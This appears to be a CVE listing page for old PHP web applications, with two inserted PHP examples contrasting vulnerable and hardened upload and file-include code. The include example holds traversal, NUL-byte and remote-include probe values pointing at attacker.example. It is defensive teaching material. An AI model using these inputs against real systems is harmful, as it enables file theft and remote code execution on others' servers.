SQL injection vulnerability in the Search gadget in Jaws 0.6.2 allows remote attackers to execute arbitrary SQL commands via queries with the "LIKE" keyword in the searchdata parameter (search field).
07-03-2011 - 21:38 28-06-2006 - 19:05
CVE-2006-3262 7.5
SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
07-03-2011 - 21:38 27-06-2006 - 17:05
CVE-2006-3104 5.0
users/index.php in Bitweaver 1.3 allows remote attackers to obtain sensitive information via an invalid sort_mode parameter, which reveals the installation path and database information in the resultant error message.
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3103 4.3
Cross-site scripting (XSS) vulnerability in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error parameter in users/login.php and the (2) feedback parameter in articles/index.php.
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3102 5.1
Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period
07-03-2011 - 21:37 20-06-2006 - 21:02
CVE-2006-3065 7.5
SQL injection vulnerability in engine/shards/blog.php in blur6ex 0.3.462 allows remote attackers to execute arbitrary SQL commands via the ID parameter in a proc_reply action in the blog shard. NOTE: This is a similar vulnerability to CVE-2006-1763,
07-03-2011 - 21:37 19-06-2006 - 06:02
CVE-2006-2868 5.1
Multiple PHP remote file inclusion vulnerabilities in Claroline 1.7.6 allow remote attackers to execute arbitrary PHP code via a URL in the includePath cookie to (1) auth/extauth/drivers/mambo.inc.php or (2) auth/extauth/drivers/postnuke.inc.php.
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2866 5.1
PHP remote file inclusion vulnerability in layout/prepend.php in DotClear 1.2.4 and earlier allows remote attackers to execute arbitrary PHP code via a FTP URL in the blog_dc_path parameter, which passes file_exists() and is_dir() tests on PHP 5.
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2857 7.5
SQL injection vulnerability in index.php in LifeType 1.0.4 allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a ViewArticle action (viewarticleaction.class.php).
07-03-2011 - 21:37 06-06-2006 - 16:06
CVE-2006-2770 5.4
Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated
07-03-2011 - 21:36 02-06-2006 - 06:18
CVE-2006-2743 5.1
Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
07-03-2011 - 21:36 01-06-2006 - 06:02
CVE-2006-2667 7.5
Direct static code injection vulnerability in WordPress 2.0.2 and earlier allows remote attackers to execute arbitrary commands by inserting a carriage return and PHP code when updating a profile, which is appended after a special comment sequence in
07-03-2011 - 21:36 30-05-2006 - 17:02
CVE-2006-2583 5.1
PHP remote file inclusion vulnerability in nucleus/libs/PLUGINADMIN.php in Nucleus 3.22 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[DIR_LIBS] parameter.
07-03-2011 - 21:36 25-05-2006 - 06:02
CVE-2006-2460 6.4
Sugar Suite Open Source (SugarCRM) 4.2 and earlier, when register_globals is enabled, does not protect critical variables such as $_GLOBALS and $_SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal
07-03-2011 - 21:36 19-05-2006 - 06:02
CVE-2006-2459 6.4
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.307 and earlier allows remote authenticated users to execute arbitrary SQL commands via the srch_where parameter.
07-03-2011 - 21:36 19-05-2006 - 06:02
CVE-2006-2405 6.8
Directory traversal vulnerability in unb_lib/abbc.conf.php in Unclassified NewsBoard (UNB) 1.6.1 patch 1 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing null
07-03-2011 - 21:36 16-05-2006 - 06:02
CVE-2006-2331 6.4
Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote attackers to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.
07-03-2011 - 21:35 11-05-2006 - 20:02
CVE-2006-2330 6.4
PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension
07-03-2011 - 21:35 11-05-2006 - 20:02
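The Bitweaver, Drupal and PHP-Fusion entries above share one root cause: Apache mod_mime evaluates every ".ext" component of a filename, so with a handler line such as "AddHandler php5-script .php" an upload named shell.php.jpg is executed by PHP even though its last extension is an image type, and an upload check that looks only at the last extension passes it. The following is an added example written for this page, not code from any of those projects; the extension lists, sample names and the random storage-name scheme are assumptions chosen for the demonstration.

```php
<?php
declare(strict_types=1);
// Added example, not code from Bitweaver, Drupal or PHP-Fusion. Apache
// mod_mime evaluates every ".ext" in a filename, so with a line such as
// "AddHandler php5-script .php" the upload shell.php.jpg is run by PHP even
// though its last extension is an image type. The checks below compare the
// last-extension test those applications used with one that mirrors
// mod_mime's rule. Extension lists and sample names are constructed.

const IMAGE_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];
// Extensions a typical AddHandler/AddType line binds to an interpreter.
const HANDLER_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl', 'shtml'];

// --- Vulnerable: only the final extension is examined.
function lastExtensionAccepts(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, IMAGE_EXTENSIONS, true);
}

// --- Hardened: every dot-separated component counts, as it does for mod_mime.
function allExtensionsAccept(string $name): bool
{
    $base = basename(str_replace('\\', '/', $name));   // strip any client path
    if ($base === '' || $base[0] === '.' || strpos($base, "\0") !== false) {
        return false;                                   // also blocks .htaccess
    }
    $parts = explode('.', strtolower($base));
    if (count($parts) !== 2 || $parts[0] === '') {      // exactly one extension
        return false;
    }
    $ext = $parts[1];
    return in_array($ext, IMAGE_EXTENSIONS, true) && !in_array($ext, HANDLER_EXTENSIONS, true);
}

// The name written to disk is chosen by the server, never by the client,
// which also removes the rename window the Bitweaver entry describes.
function storageName(string $clientName): ?string
{
    if (!allExtensionsAccept($clientName)) {
        return null;
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names.
$samples = ['photo.jpg', 'shell.php.jpg', 'x.PhP.Gif', 'shell.jpg.php', 'a.phtml.png', '.htaccess'];
foreach ($samples as $name) {
    printf("%-15s last-ext: %-6s all-ext: %-6s stored as: %s\n",
        $name,
        lastExtensionAccepts($name) ? 'pass' : 'reject',
        allExtensionsAccept($name) ? 'pass' : 'reject',
        storageName($name) ?? '-');
}
```

Run it with the PHP CLI. The filename check is only half of the fix: on the Apache side, bind PHP with an anchored `<FilesMatch "\.php$">` plus `SetHandler` rather than `AddHandler`, so only a trailing .php is ever executed, and serve the upload directory with the PHP engine disabled (or from outside the document root). Call move_uploaded_file() only after validation, straight from the temporary upload path into the final name, so no intermediate file with the client's name ever exists under the web root.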
CVE-2006-2156 6.4
Directory traversal vulnerability in help/index.php in X7 Chat 2.0 and earlier allows remote attackers to include arbitrary files via .. (dot dot) sequences in the help_file parameter.
07-03-2011 - 21:35 03-05-2006 - 06:02
CVE-2006-2029 6.4
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) tid parameter in (a) preview.php; the (2) cid, (3) pid, and (4) eid parameters in (b) archive.php
07-03-2011 - 21:34 25-04-2006 - 20:06
CVE-2006-1839 7.5
PHP remote file inclusion vulnerability in language.php in PHP Album 0.3.2.3, when register_globals is enabled, allows remote attackers to execute arbitrary code via an FTP URL in the data_dir parameter, which satisfies the file_exists function call.
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1832 5.0
sysinfo.cgi in sysinfo 1.21 allows remote attackers to obtain the installation path via the debugger action.
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1831 7.5
Direct static code injection vulnerability in sysinfo.cgi in sysinfo 1.21 and possibly other versions before 2.25 allows remote attackers to execute arbitrary commands via a leading ; (semicolon) in the name parameter in a systemdoc action, which is
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1828 5.1
SQL injection vulnerability in php121language.php in PHP121 1.4 allows remote attackers to execute arbitrary SQL commands and execute arbitrary code via the sess_username variable, as set by the php121un HTTP COOKIE parameter, which is used in multip
07-03-2011 - 21:34 19-04-2006 - 12:06
CVE-2006-1784 5.1
PHP remote file inclusion vulnerability in admin/configset.php in Sphider 1.3 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the settings_dir parameter.
07-03-2011 - 21:34 13-04-2006 - 18:02
CVE-2006-1779 6.8
Cross-site scripting (XSS) vulnerability in login.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the btag parameter.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1778 7.5
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) blogid parameter in (a) index.php and (b) archive.php, the (2) m and (3) y parameters in archive.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1777 7.5
Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PH
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1776 7.5
PHP remote file inclusion vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the s parameter.
07-03-2011 - 21:34 13-04-2006 - 06:02
CVE-2006-1645 6.8
Cross-site scripting (XSS) vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP heade
07-03-2011 - 21:33 06-04-2006 - 06:04
CVE-2006-1595 4.3
Cross-site scripting (XSS) vulnerability in document/rqmkhtml.php in Claroline 1.7.4 and earlier allows remote attackers to read arbitrary files via ".." sequences in the file parameter in a rqEditHtml command.
07-03-2011 - 21:33 03-04-2006 - 06:04
CVE-2006-1495 7.5
SQL injection vulnerability in general/sendpassword.php in (1) PHPCollab 2.4 and 2.5.rc3, and (2) NetOffice 2.5.3-pl1 and 2.6.0b2 allows remote attackers to execute arbitrary SQL commands via the loginForm parameter in the "forgotten password" option
07-03-2011 - 21:33 29-03-2006 - 19:06
CVE-2006-1480 5.1
Directory traversal vulnerability in start.php in WebAlbum 2.02 allows remote attackers to include arbitrary files and execute commands by (1) injecting code into local log files via GET commands, then (2) accessing that log via a .. (dot dot) sequen
07-03-2011 - 21:33 28-03-2006 - 20:06
CVE-2006-1348 4.3
Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[*][file] parameter, which is injected into an error message. NOTE: this iss
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1347 7.5
SQL injection vulnerability in loginfunction.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1346 6.4
Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by i
07-03-2011 - 21:32 21-03-2006 - 20:02
CVE-2006-1292 5.0
Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_lan
07-03-2011 - 21:32 19-03-2006 - 18:02
CVE-2006-1291 7.5
publish.ical.php in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier does not require authentication for write access to the calendars directory, which allows remote attackers to upload and execute arbitrary PHP scripts via a WebDAV PUT request
07-03-2011 - 21:32 19-03-2006 - 18:02
CVE-2006-1243 7.5
Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language para
07-03-2011 - 21:32 15-03-2006 - 12:06
CVE-2006-1219 5.0
Directory traversal vulnerability in Gallery 2.0.3 and earlier, and 2.1 before RC-2a, allows remote attackers to include arbitrary PHP files via ".." (dot dot) sequences in the stepOrder parameter to (1) upgrade/index.php or (2) install/index.php.
07-03-2011 - 21:32 13-03-2006 - 21:02
CVE-2006-1162 5.1
Directory traversal vulnerability in Nodez 4.6.1.1 and earlier allows remote attackers to read or include arbitrary PHP files via a .. (dot dot) in the op parameter, as demonstrated by inserting malicious Email parameters into list.gtdat, then acces
07-03-2011 - 21:32 12-03-2006 - 16:02
CVE-2006-1149 7.5
PHP remote file inclusion vulnerability in lib/OWL_API.php in OWL Intranet Engine 0.82, when register_globals is enabled, allows remote attackers to include arbitrary files via a URL in the xrms_file_root parameter, which is not initialized before us
07-03-2011 - 21:32 10-03-2006 - 06:02
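The Phorum, UNB, PHP iCalendar, Simple PHP Blog and Gallery entries above are local file inclusions through a path built from a request parameter, with the trailing NUL byte used to cut off a fixed ".php" suffix on PHP releases before 5.3.4; the DotClear, PHP Album and OWL entries are the remote variant, where a URL (including an ftp:// one that satisfied file_exists() on PHP 5) is fed into the same kind of include. The same construction recurs in the later directory-traversal entries on this page. The block below is an added example for this page, not code from any of those projects: it shows the vulnerable path construction and a resolver that rejects traversal, NUL bytes and URL schemes. The base directory, the file names, the probe values and the allowed-name pattern are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);
// Added example, not code from Phorum, UNB, PHP iCalendar, Simple PHP Blog,
// Gallery, DotClear, PHP Album or OWL. Shows the include-path construction
// those entries share and a resolver that rejects traversal, NUL bytes and
// URL schemes. The base directory, file names and probe values are
// constructed for the demonstration; the allowed-name pattern is an assumption.

// --- Vulnerable: the parameter is glued into the path and then include()d.
// Before PHP 5.3.4 a NUL byte in $lang truncated the path at that byte, so
// "../../../etc/passwd%00" lost the ".php" suffix; with allow_url_include
// (or, for file_exists() on PHP 5, a plain ftp:// URL) the same line fetched
// remote code.
function vulnerablePath(string $base, string $lang): string
{
    return $base . '/' . $lang . '.php';
}

// --- Hardened: allow-list the name, resolve both ends, confine to $base.
function resolvePath(string $base, string $lang): ?string
{
    // 1. A single path segment from a tight alphabet: no "/", "\", ".", NUL,
    //    no "scheme://". Adjust the pattern to the real naming scheme.
    if (!preg_match('/^[a-z]{2}(_[A-Z]{2})?$/D', $lang)) {
        return null;
    }
    // 2. realpath() collapses ".." and symlinks and fails for missing files,
    //    so the check below compares canonical, existing paths only.
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $lang . '.php');
    if ($baseReal === false || $target === false) {
        return null;
    }
    // 3. The canonical target must lie inside the canonical base.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed environment: <root>/lang/en.php plus a file outside lang/.
$root = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
mkdir("$root/lang", 0700, true);
file_put_contents("$root/lang/en.php", "<?php return 'hello';\n");
file_put_contents("$root/secret.txt", "db_password=hunter2\n");

$probes = [
    'en',                                   // legitimate
    '../secret.txt',                        // traversal
    "../secret.txt\0",                      // traversal + NUL truncation (PHP < 5.3.4)
    'http://attacker.example/shell.txt?',   // remote include; "?" swallows ".php"
    'ftp://attacker.example/shell',         // passes file_exists() on PHP 5
];
foreach ($probes as $lang) {
    $built = str_replace($root, '<root>', vulnerablePath("$root/lang", $lang));
    $safe  = resolvePath("$root/lang", $lang);
    printf("%-42s vulnerable builds %s | hardened: %s\n",
        addcslashes($lang, "\0..\37"),
        addcslashes($built, "\0..\37"),
        $safe === null ? 'rejected' : str_replace(realpath($root), '<root>', $safe));
}

// Clean up the constructed files.
unlink("$root/lang/en.php"); unlink("$root/secret.txt");
rmdir("$root/lang"); rmdir($root);
```

Run it with the PHP CLI. The allow-list in step 1 does the real work; steps 2 and 3 are the backstop for the day someone loosens the pattern. Note that current PHP rejects NUL bytes in filesystem calls on its own, which closes the "%00" trick but not plain traversal, and that allow_url_include should stay off regardless, since the resolver cannot protect an include() that is reached by a different code path.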
CVE-2006-0899 7.5
Directory traversal vulnerability in index.php in 4Images 1.7.1 and earlier allows remote attackers to read and include arbitrary files via ".." (dot dot) sequences in the template parameter.
07-03-2011 - 21:31 27-02-2006 - 14:06
CVE-2006-0852 7.5
Direct static code injection vulnerability in write.php in Admbook 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via the X-Forwarded-For HTTP header field, which is inserted into content-data.php.
07-03-2011 - 21:30 22-02-2006 - 21:06
CVE-2006-0714 5.0
Directory traversal vulnerability in the installation file (sql/install-0.9.7.php) in Flyspray 0.9.7 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the adodbpath parameter.
07-03-2011 - 21:30 15-02-2006 - 06:06
CVE-2006-0713 5.0
Directory traversal vulnerability in LinPHA 1.0 allows remote attackers to include arbitrary files via .. (dot dot) sequences in the (1) lang parameter in docs/index.php and the language parameter in (2) install/install.php, (3) install/sec_stage_ins
07-03-2011 - 21:30 15-02-2006 - 06:06
CVE-2006-0687 5.0
process.php in DocMGR 0.54.2 does not initialize the $siteModInfo variable when a direct request is made, which allows remote attackers to include arbitrary local files or possibly remote files via a modified includeModule and siteModInfo variable.
07-03-2011 - 21:30 14-02-2006 - 19:02
CVE-2006-0626 7.5
SQL injection vulnerability in spip_acces_doc.php3 in SPIP 1.8.2g and earlier allows remote attackers to execute arbitrary SQL commands via the file parameter.
07-03-2011 - 21:30 09-02-2006 - 13:06
CVE-2006-0625 6.4
Directory traversal vulnerability in Spip_RSS.PHP in SPIP 1.8.2g and earlier allows remote attackers to read or include arbitrary files via ".." sequences in the GLOBALS[type_urls] parameter, which could then be used to execute arbitrary code via re
07-03-2011 - 21:30 09-02-2006 - 13:06
CVE-2006-0583 7.5
SQL injection vulnerability in mailarticle.php in Clever Copy 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the ID parameter.
07-03-2011 - 21:30 07-02-2006 - 20:02
CVE-2005-4468 7.5
PHP remote file include vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to execute arbitrary code via a URL in the PGV_BASE_DIRECTORY parameter.
07-03-2011 - 21:28 21-12-2005 - 19:03
CVE-2005-4467 5.0
Directory traversal vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to read and include arbitrary files via a .. (dot dot) in the PGV_BASE_DIRECTORY parameter.
07-03-2011 - 21:28 21-12-2005 - 19:03
CVE-2005-4319 5.0
Directory traversal vulnerability in index2.php in Limbo CMS 1.0.4.2 and earlier allows remote attackers to include arbitrary PHP files via ".." sequences in the option parameter.
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4318 7.5
SQL injection vulnerability in index.php in Limbo CMS 1.0.4.2 and earlier, with register_globals off, allows remote attackers to execute arbitrary SQL commands via the _SERVER[REMOTE_ADDR] parameter, which modifies the underlying $_SERVER variable.
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4317 6.8
Limbo CMS 1.0.4.2 and earlier, with register_globals off, does not protect the $_SERVER variable from external modification, which allows remote attackers to use the _SERVER[REMOTE_ADDR] parameter to (1) conduct cross-site scripting (XSS) attacks in
07-03-2011 - 21:27 17-12-2005 - 06:03
CVE-2005-4226 7.5
Multiple "potential" SQL injection vulnerabilities in phpWebThings 1.4 Patched might allow remote attackers to execute arbitrary SQL commands via (1) the ref parameter in download.php, (2) the direction, msg, sforum, reason, subname, and toform param
07-03-2011 - 21:27 14-12-2005 - 06:03
CVE-2005-4213 7.5
SQL injection vulnerability in mod.php in phpCOIN 1.2.2 allows remote attackers to execute arbitrary SQL commands via the phpcoinsessid cookie.
07-03-2011 - 21:27 14-12-2005 - 06:03
CVE-2005-4140 7.5
SQL injection vulnerability in admin/login/index.php in Website Baker 2.6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter, as used by the user field.
07-03-2011 - 21:27 09-12-2005 - 10:03
CVE-2005-4095 5.0
Directory traversal vulnerability in connector.php in the fckeditor2rc2 addon in DoceboLMS 2.0.4 allows remote attackers to list arbitrary files and directories via ".." sequences in the Type parameter in a GetFoldersAndFiles command.
07-03-2011 - 21:27 08-12-2005 - 06:03
CVE-2005-4086 5.0
Directory traversal vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to include arbitrary local files via ".." sequences in the beanFiles array para
07-03-2011 - 21:27 08-12-2005 - 06:03
CVE-2005-3968 7.5
SQL injection vulnerability in auth.inc.php in PHPX 3.5.9 and earlier allows remote attackers to execute arbitrary SQL commands, bypass authentication, and upload arbitrary PHP code via the username parameter.
07-03-2011 - 21:27 03-12-2005 - 14:03
CVE-2005-3929 5.0
Directory traversal vulnerability in the create function in xarMLSXML2PHPBackend.php in Xaraya 1.0 allows remote attackers to create directories and overwrite arbitrary files via ".." sequences in the module parameter to index.php.
07-03-2011 - 21:27 30-11-2005 - 06:03
CVE-2005-3926 7.5
Direct static code injection vulnerability in error.php in GuppY 4.5.9 and earlier, when register_globals is disabled, allows remote attackers to execute arbitrary PHP code via the _SERVER[REMOTE_ADDR] parameter, which is injected into a .inc script
07-03-2011 - 21:27 30-11-2005 - 06:03
CVE-2005-3738 2.6
globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to co
07-03-2011 - 21:27 22-11-2005 - 06:03
CVE-2005-3575 7.5
SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:26 16-11-2005 - 02:42
CVE-2005-3324 7.5
SQL injection vulnerability in chat.php in MWChat 6.8 allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-03-2011 - 21:26 27-10-2005 - 06:02
CVE-2006-1371 9.0
Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using (1) manager.php, (2) standalonemanager.php, and (3) images.php.
07-03-2011 - 00:00 23-03-2006 - 18:06
CVE-2009-4115 6.5
Multiple static code injection vulnerabilities in the Categories module in CutePHP CuteNews 1.4.6 allow remote authenticated users with application administrative privileges to inject arbitrary PHP code into data/category.db.php via the (1) category
18-01-2011 - 00:00 30-11-2009 - 16:30
CVE-2009-4978 5.0
Directory traversal vulnerability in down.php in MyBackup 1.4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.
25-08-2010 - 00:00 25-08-2010 - 16:00
CVE-2009-4977 6.5
PHP remote file inclusion vulnerability in index.php in MyBackup 1.4.0 allows remote authenticated users to execute arbitrary PHP code via a URL in the main_content parameter.
25-08-2010 - 00:00 25-08-2010 - 16:00
CVE-2009-4733 6.8
SQL injection vulnerability in checkuser.php in SimpleLoginSys 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party in
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4726 5.0
Directory traversal vulnerability in download.php in Quickdev 4 PHP allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4722 6.8
SQL injection vulnerability in the CheckLogin function in includes/functions.php in Limny 1.01, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
25-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4732 6.8
SQL injection vulnerability in tt/index.php in TT Web Site Manager 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the tt_name parameter. NOTE: some of these details are obtained from third party
23-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4723 7.5
Directory traversal vulnerability in confirm.php in Netpet CMS 1.9 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.
23-06-2010 - 00:00 18-03-2010 - 14:30
CVE-2009-4754 9.3
Stack-based buffer overflow in Mercury Audio Player 1.21 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
21-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4759 9.3
Buffer overflow in BrotherSoft BMXPlay 0.4.4b allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long string in a .BMX file.
08-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4757 9.3
Stack-based buffer overflow in BrotherSoft EW-MusicPlayer 0.8 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: some of these deta
08-06-2010 - 00:00 29-03-2010 - 14:30
CVE-2009-4836 7.5
Eval injection vulnerability in system/services/init.php in Movie PHP Script 2.0 allows remote attackers to execute arbitrary PHP code via the anticode parameter.
11-05-2010 - 00:00 06-05-2010 - 08:47
CVE-2009-4793 6.0
Unrestricted file upload vulnerability in adminpanel/scripts/addphotos.php in BandSite CMS 1.1.4 allows remote authenticated administrators to execute arbitrary PHP code by uploading a file with an executable extension via an addphotos action to admi
23-04-2010 - 00:00 22-04-2010 - 10:30
CVE-2009-4792 7.5
SQL injection vulnerability in includes/content/member_content.php in BandSite CMS 1.1.4 allows remote attackers to execute arbitrary SQL commands via the memid parameter to members.php.
23-04-2010 - 00:00 22-04-2010 - 10:30
CVE-2009-4756 9.3
Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.
30-03-2010 - 10:07 29-03-2010 - 14:30
CVE-2009-3507 7.5
Directory traversal vulnerability in modules.php in CMSphp 0.21 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the mod_file parameter.
08-12-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-4209 4.3
Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in moziloCMS 1.11.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) file parameters in an editsite action, different vectors than CVE-2008-61
07-12-2009 - 00:00 04-12-2009 - 14:30
CVE-2009-3967 7.5
SQL injection vulnerability in browse.php in Ed Charkow SuperCharged Linking allows remote attackers to execute arbitrary SQL commands via the id parameter.
19-11-2009 - 00:00 18-11-2009 - 18:30
CVE-2009-3716 6.5
Unrestricted file upload vulnerability in admin.php in MCshoutbox 1.1 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in smilies/.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2009-3715 6.8
Multiple SQL injection vulnerabilities in scr_login.php in MCshoutbox 1.1, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2009-3714 4.3
Cross-site scripting (XSS) vulnerability in admin_login.php in MCshoutbox 1.1 allows remote attackers to inject arbitrary web script or HTML via the loginerror parameter.
16-10-2009 - 00:00 16-10-2009 - 12:30
CVE-2007-2853 10.0
The VCDAPILibApi ActiveX control in vc9api.DLL 9.0.0.57 in Virtual CD 9.0.0.2 allows remote attackers to execute arbitrary commands via a command line in the first argument to the VCDLaunchAndWait function.
14-10-2009 - 00:59 24-05-2007 - 15:30
CVE-2009-3596 7.5
JoxTechnology Ajox Poll does not properly restrict access to admin/managepoll.php, which allows remote attackers to bypass authentication and gain administrative access via a direct request.
09-10-2009 - 00:00 08-10-2009 - 13:30
CVE-2009-3515 6.5
Directory traversal vulnerability in dnet_admin/index.php in d.net CMS allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the type parameter.
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3514 6.5
Multiple SQL injection vulnerabilities in d.net CMS allow remote attackers to execute arbitrary SQL commands via (1) the page parameter to index.php; and allow remote authenticated administrators to execute arbitrary SQL commands via the (2) edit_id
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3506 4.3
Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php.
02-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3511 7.5
Multiple PHP remote file inclusion vulnerabilities in justVisual 1.2 allow remote attackers to execute arbitrary PHP code via a URL in the fs_jVroot parameter to (1) sites/site/pages/index.php, (2) sites/test/pages/contact.php, (3) system/pageTemplat
01-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3508 6.0
Multiple directory traversal vulnerabilities in MUJE CMS 1.0.4.34 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) _class parameter to admin.php and the (2) url parameter to install/install.php; and al
01-10-2009 - 00:00 01-10-2009 - 10:30
CVE-2009-3423 6.8
login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
CVE-2009-3422 6.8
